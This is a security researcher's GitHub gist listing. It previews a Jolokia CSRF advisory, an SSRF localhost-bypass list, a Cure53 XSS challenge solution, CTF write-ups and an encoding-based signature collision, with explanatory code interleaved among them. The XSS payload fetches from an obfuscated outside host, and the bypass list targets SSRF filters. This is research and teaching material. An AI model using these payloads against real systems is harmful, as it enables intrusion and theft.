Martin Bajanik bayotop

bayotop / jolokia-1.6.0-csrf.md
Created Jul 3, 2019
CVE-2018-10899: CSRF in Jolokia 1.6.0

Summary

Jolokia 1.6.0 is vulnerable to CSRF. This holds true even for properly configured instances with strict checking of the Origin and Referer headers enabled. The issue was fixed in version 1.6.1.

Red Hat Security Advisory: https://access.redhat.com/security/cve/cve-2018-10899

Details

In version 1.2.1 Jolokia introduced a <strict-checking/> option within the Cross-Origin Resource Sharing policy defined in jolokia-access.xml to prevent CSRF (4.1.5).

bayotop / gauth.py
Last active Jun 27, 2019
Programmatic authentication to GCP's Identity-Aware Proxy
# https://cloud.google.com/iap/docs/authentication-howto
import json
import time
from jwt import JWT, jwk_from_pem
import requests
jwt = JWT()
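The gist preview stops after its imports, so the flow it implements is shown here as an added example (mine, not bayotop's gauth.py) following the service-account procedure in the linked Google document: build a self-signed JWT whose `aud` is the token endpoint and whose `target_audience` is the IAP OAuth client ID, exchange it with the `jwt-bearer` grant for an OIDC `id_token`, and send that as a bearer token to the protected resource. The service-account e-mail, client ID and URL are placeholders; `sign` is a caller-supplied callback so the assembly can be inspected offline, and for a real exchange it must produce an RS256 signature with the service account's private key (which the gist gets from python-jwt's `JWT().encode(..., alg='RS256')`). The two network functions are only exercised against the real endpoints.

```python
import base64
import json
import time
import urllib.parse
import urllib.request

TOKEN_URI = "https://oauth2.googleapis.com/token"
JWT_BEARER = "urn:ietf:params:oauth:grant-type:jwt-bearer"


def _b64url(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def build_assertion_claims(service_account_email, iap_client_id, now=None, lifetime=3600):
    """Claims of the self-signed JWT that is exchanged for an OIDC token IAP accepts."""
    now = int(time.time()) if now is None else now
    return {
        "iss": service_account_email,
        "sub": service_account_email,
        "aud": TOKEN_URI,                  # the token endpoint, not the protected app
        "target_audience": iap_client_id,  # OAuth client ID of the IAP-secured resource
        "iat": now,
        "exp": now + lifetime,             # keep this at one hour or less
    }


def encode_jwt(claims, sign):
    """Compact-serialise header.claims.signature; sign(signing_input: bytes) -> bytes.

    The header announces RS256: the signer passed in must actually be RS256 over the
    service account's private key for Google to accept the assertion (assumption:
    the caller provides that; this function does no cryptography itself).
    """
    header = {"alg": "RS256", "typ": "JWT"}
    segments = [_b64url(json.dumps(part, separators=(",", ":")).encode("utf-8"))
                for part in (header, claims)]
    signing_input = ".".join(segments)
    return signing_input + "." + _b64url(sign(signing_input.encode("ascii")))


def decode_claims(jwt):
    """Read the claims back without verifying the signature (inspection only)."""
    payload = jwt.split(".")[1]
    return json.loads(base64.urlsafe_b64decode(payload + "=" * (-len(payload) % 4)))


def token_request_body(assertion):
    """Form body of the jwt-bearer grant sent to the token endpoint."""
    return urllib.parse.urlencode({"grant_type": JWT_BEARER, "assertion": assertion}).encode("ascii")


def fetch_id_token(assertion):
    """Exchange the assertion for an OIDC id_token (network call to Google)."""
    req = urllib.request.Request(
        TOKEN_URI,
        data=token_request_body(assertion),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)["id_token"]


def get_iap_resource(url, id_token):
    """Call the IAP-protected URL with the OIDC token as a bearer token (network call)."""
    req = urllib.request.Request(url, headers={"Authorization": "Bearer " + id_token})
    with urllib.request.urlopen(req) as resp:
        return resp.read()


if __name__ == "__main__":
    # Placeholder identifiers; replace with the service account and IAP client ID.
    claims = build_assertion_claims("sa@project.iam.gserviceaccount.com",
                                    "CLIENT_ID.apps.googleusercontent.com")
    print(json.dumps(claims, indent=2))
```

The `id_token` returned by the exchange is what IAP validates; the service account itself must also be granted the IAP-secured Web App User role on the resource, otherwise a well-formed token still gets a 403.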
bayotop / hrefs.py
Last active Dec 4, 2018
Identify "href" (i.e., free "javascript:" XSS) and dangerouslySetInnerHTML usages in ReactJS SPAs.
import re
import sys

# "href:" whose value is not a string literal: the URL is computed at runtime, so a
# "javascript:" value can reach it unless validated elsewhere.
VULNERABLE_HREF = r'href: [^"].+[^\s]?'
# dangerouslySetInnerHTML payloads: whatever is passed as __html is injected unescaped.
DANGEROUSLY_SET_INNER_HTML = r'__html: .+[^\s]?'
# Object literal passed to this.setState({...}), to trace where state values come from.
STATE_VALUES = r'\.setState\({([\s\S]*?)}\)'
#false_positives = ("this.props.team.", "constants.")
def find_state_candidates(name, states):
    # Body is cut off in the gist preview; minimal reconstruction: keep the setState()
    # bodies that assign the given key.
    return [s for s in states if re.search(r'\b' + re.escape(name) + r'\s*:', s)]
bayotop / h1-702-web-ctf.md
Created Jun 20, 2018
h1-702 CTF 2018 - Web 1
bayotop / bypasses.txt
Last active Oct 9, 2019
Various useful bypasses
# SSRF localhost (@omespino)
http://127.0.0.1
http://[::]/ # ipv6
http://0/
http://localtest.me # dns to 127.0.0.1
http://2130706433/ # decimal
http://0x7f000001/ # hex
http://0x7f.0x00.0x00.0x01 # hex
http://0177.0.0.01 # octal
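Each of the numeric forms above is a different spelling of the same address, which is why a deny-list that compares the host string against "127.0.0.1" or "localhost" fails. The check below is an added example (mine, not from the gist) that normalises a URL's host the way inet_aton does (one to four dot-separated parts, each decimal, `0x` hex or leading-zero octal, the last part filling the remaining bytes) and then classifies the resulting address with `ipaddress`. DNS names such as localtest.me cannot be judged from the string at all; the function reports them as needing resolution, and the real check has to run on the resolved address (and on the socket actually connected, because of rebinding).

```python
import ipaddress
from urllib.parse import urlsplit


def _parse_part(part):
    """One dotted component as inet_aton reads it: 0x hex, leading-zero octal, else decimal."""
    if part[:2] in ("0x", "0X"):
        return int(part[2:] or "0", 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def parse_ipv4_shorthand(host):
    """Accept every numeric form inet_aton accepts; the last part fills the remaining bytes."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or any(p == "" for p in parts):
        raise ValueError("not a numeric IPv4 form")
    values = [_parse_part(p) for p in parts]
    last_bits = 8 * (5 - len(values))  # 4 parts -> 8 bits, 1 part -> 32 bits
    if any(not 0 <= v <= 255 for v in values[:-1]) or not 0 <= values[-1] < (1 << last_bits):
        raise ValueError("component out of range")
    number = 0
    for v in values[:-1]:
        number = (number << 8) | v
    number = (number << last_bits) | values[-1]
    return ipaddress.IPv4Address(number)


def target_address(url):
    """The IP the URL literally names, or None when the host is a DNS name."""
    host = urlsplit(url).hostname  # lowercased; brackets stripped from IPv6 literals
    if host is None:
        raise ValueError("URL has no host")
    if ":" in host:
        return ipaddress.IPv6Address(host)  # e.g. "::" from http://[::]/
    try:
        return parse_ipv4_shorthand(host)
    except ValueError:
        return None


def is_internal(addr):
    """Loopback, unspecified (0.0.0.0 and :: connect to the local host), private, link-local."""
    return addr.is_loopback or addr.is_unspecified or addr.is_private or addr.is_link_local


def classify(url):
    """'internal' or 'external' for literal addresses; 'resolve' when DNS is needed first."""
    addr = target_address(url)
    if addr is None:
        return "resolve"  # localtest.me -> 127.0.0.1: judge the resolved address, not the name
    return "internal" if is_internal(addr) else "external"


if __name__ == "__main__":
    for u in ["http://127.0.0.1", "http://[::]/", "http://0/", "http://localtest.me",
              "http://2130706433/", "http://0x7f000001/", "http://0x7f.0x00.0x00.0x01",
              "http://0177.0.0.01"]:
        print(classify(u), target_address(u), u)
```

Note that `ipaddress.ip_address()` alone is not enough here: it rejects the shorthand forms outright, and versions before 3.9.5 read a leading-zero component as decimal (0177 as 177), which is the opposite of what the resolver will do.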
bayotop / cure53-2018.md
Last active May 30, 2018
Cure53 - Chinese New Year Challenge 2018

Works in latest Firefox 58.0.2 (Windows 10, 64-bit) (copy-paste into browser to preserve URL encoding):

https://henhouse.cure53.berlin?value=<svg onload="document.cookie=`user=onerror%253dalert%253bthrow document.scripts[0].attributes[0].value%252f%252f;domain=.cure53.berlin`;fetch(atob(`aHR0cHM6Ly9iYWphbmlrLmNvbQ==`)).then(r=>r.text()).then(function(t){location=atob(atob(`YUhSMGNITTZMeTluYjJ4a1pXNWxaMmN1WTNWeVpUVXpMbUpsY214cGJpOC9lSE56UFR4NElHbGtQVmR2ZHlBdlBqeHpZM0pwY0hRZ2FXUTlkMlZzWTI5dFpVMXpaejQ4TDNOamNtbHdkRDRtZEc5clpXNDk=`))%2bt})">&key=.element.innerHTML

When pasting into submit.cure53.berlin, the above has to be URL decoded once:

https://henhouse.cure53.berlin?value=<svg onload="document.cookie=`user=onerror%3dalert%3bthrow document.scripts[0].attributes[0].value%2f%2f;domain=.cure53.berlin`;fetch(atob(`aHR0cHM6Ly9iYWphbmlrLmNvbQ==`)).then(r=>r.text()).then(function(t){location=atob(atob(`YUhSMGNITTZMeTluYjJ4a1pXNWxaMmN1WTNWeVpUVXpMbUpsY214cGJpOC9lSE56UFR4NElHbGtQVmR2ZHlBdlBqeHpZM0pwY0hR
bayotop / keybase.md
Created Jan 15, 2018
Keybase.io GH Verification

Keybase proof

I hereby claim:

  • I am bayotop on github.
  • I am bayotop (https://keybase.io/bayotop) on keybase.
  • I have a public key whose fingerprint is 38D3 3EC0 5654 05BC 3C76 686F C090 53E7 6BFB A3FD

To claim this, I am signing this object:

bayotop / last-evet-id.md
Last active May 25, 2019
Sending arbitrary Last-Event-ID header values across origins using the EventSource API.

The EventSource API

The EventSource interface is used to receive server-sent events. It connects to a server over HTTP and receives events in text/event-stream format without closing the connection.

https://developer.mozilla.org/en-US/docs/Web/API/EventSource

Last-Event-ID

Setting an ID lets the browser keep track of the last event fired, so that if the connection to the server is dropped, a special HTTP header (Last-Event-ID) carrying that ID is set on the new request.
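The header value is chosen entirely by the server that sent the `id:` field, which is what makes the mechanism interesting when that server is the attacker's. The parser below is an added example (mine, not from the gist) that applies the EventSource field rules from the HTML specification to a constructed stream and shows the value the browser would carry in Last-Event-ID on reconnect: a single space after the colon is stripped, `:`-prefixed lines are comments, the ID persists across events until replaced, and an `id:` containing a NUL byte is ignored. The header set in `reconnect_headers` is limited to `Accept` and `Last-Event-ID`; a real browser adds more.

```python
def parse_event_stream(text, last_event_id=""):
    """Parse a text/event-stream body.

    Returns (events, last_event_id): the dispatched events and the value the
    browser would send as Last-Event-ID when it reconnects.
    """
    events = []
    data_lines = []
    event_type = ""
    id_buffer = last_event_id  # "last event ID buffer": persists across events
    for line in text.replace("\r\n", "\n").replace("\r", "\n").split("\n"):
        if line == "":
            # Blank line: dispatch. The ID is committed even when the block has no data.
            last_event_id = id_buffer
            if data_lines:
                events.append({
                    "event": event_type or "message",
                    "data": "\n".join(data_lines),
                    "lastEventId": last_event_id,
                })
            data_lines, event_type = [], ""
            continue
        if line.startswith(":"):
            continue  # comment line (servers use these as keep-alives)
        field, sep, value = line.partition(":")
        if sep and value.startswith(" "):
            value = value[1:]  # exactly one leading space after the colon is dropped
        if field == "data":
            data_lines.append(value)
        elif field == "event":
            event_type = value
        elif field == "id":
            # Any text the server likes, except that a NUL makes the browser ignore it.
            if "\x00" not in value:
                id_buffer = value
        # "retry" and unknown fields are irrelevant here and ignored
    return events, last_event_id


def reconnect_headers(last_event_id):
    """Headers relevant here on the reconnect request; Last-Event-ID only when non-empty."""
    headers = {"Accept": "text/event-stream"}
    if last_event_id != "":
        headers["Last-Event-ID"] = last_event_id
    return headers


# Constructed stream from a server under the attacker's control (not a real capture).
ATTACKER_STREAM = (
    "id: anything the server likes; spaces, quotes and \"json\" included\n"
    "data: first\n"
    "\n"
    ": keep-alive comment, ignored\n"
    "id: rejected\x00value\n"  # contains NUL: ignored, the previous ID stays
    "data: second\n"
    "data: line\n"
    "\n"
)


def demo():
    events, last_id = parse_event_stream(ATTACKER_STREAM)
    return events, last_id, reconnect_headers(last_id)


if __name__ == "__main__":
    for item in demo():
        print(item)
```

Because the value is constrained only by the line-based framing (no CR or LF, no NUL), a server can put almost any byte sequence into a header the client never had to ask for; this is the behaviour the gist title refers to.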

View h1_212_writeup.md

Description

https://www.hackerone.com/blog/hack-your-way-to-nyc-this-december-for-h1-212

How I found the flag

I ran an obligatory port scan, checked the IP using shodan.io, and did some basic directory discovery. I found two open ports - 22 and 80 - and one directory /flag with a message from the creators.

As this wasn't really helpful, I tried to enumerate vhosts and found one resulting in a different response: admin.acme.org.

bayotop / utf8_fallback.cs
Created Aug 22, 2017
Unsafe default behavior of Encoding.UTF8.GetBytes()
using System;

// Two distinct strings, each a lone (unpaired) high surrogate: valid .NET strings,
// but neither can be represented in UTF-8.
string secret = "\ud8ab";
string secret2 = "\ud8cd";
if (!secret.Equals(secret2))
{
    Console.Out.WriteLine("The strings are not equal.");
}
// computeSignature (body not shown in this preview) keys its hash on Encoding.UTF8.GetBytes(secret).
// Encoding.UTF8 uses a replacement fallback by default, so both surrogates become the same
// bytes (U+FFFD, EF BF BD) and the signatures collide; new UTF8Encoding(false, true) would throw instead.
computeSignature(secret, "timestamp", "payload"); // returns 1eba7aac5f10ee7aa985722256aa4125e8e59fe256386c8ab10295063d986e57
computeSignature(secret2, "timestamp", "payload"); // returns 1eba7aac5f10ee7aa985722256aa4125e8e59fe256386c8ab10295063d986e57
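The same failure reproduces in Python, shown here as an added example (mine, not the gist's code). Python's `str.encode` refuses lone surrogates by default, but with `errors="replace"` it substitutes `?` where .NET's default fallback substitutes U+FFFD; either way two different secrets collapse to identical key bytes and therefore identical MACs. `compute_signature` is an assumed HMAC-SHA256 stand-in for the gist's `computeSignature`, whose body is not shown; the message layout is mine.

```python
import hashlib
import hmac

# Two distinct secrets, each a lone (unpaired) high surrogate: valid str values that
# are not representable in UTF-8. Constructed test values.
SECRET_A = "\ud8ab"
SECRET_B = "\ud8cd"


def key_bytes(secret, errors):
    """Key material as the signing code sees it under a given encoding error policy."""
    return secret.encode("utf-8", errors)


def compute_signature(secret, timestamp, payload, errors="strict"):
    """HMAC-SHA256 stand-in for the gist's computeSignature (assumed message layout)."""
    message = (timestamp + "." + payload).encode("utf-8")
    return hmac.new(key_bytes(secret, errors), message, hashlib.sha256).hexdigest()


def signatures_collide(errors):
    """True if both secrets give one signature, False if they differ, None if encoding is refused."""
    try:
        return (compute_signature(SECRET_A, "timestamp", "payload", errors)
                == compute_signature(SECRET_B, "timestamp", "payload", errors))
    except UnicodeEncodeError:
        return None


if __name__ == "__main__":
    for policy in ("replace", "strict", "surrogatepass"):
        print(policy, signatures_collide(policy))
```

The safe default is the strict one: a secret that cannot be encoded losslessly should fail loudly at load time rather than be silently mapped onto the same bytes as every other malformed secret. `surrogatepass` keeps the two distinct (it emits the raw three-byte surrogate encodings), but it is a way to preserve bytes, not a reason to accept malformed secrets.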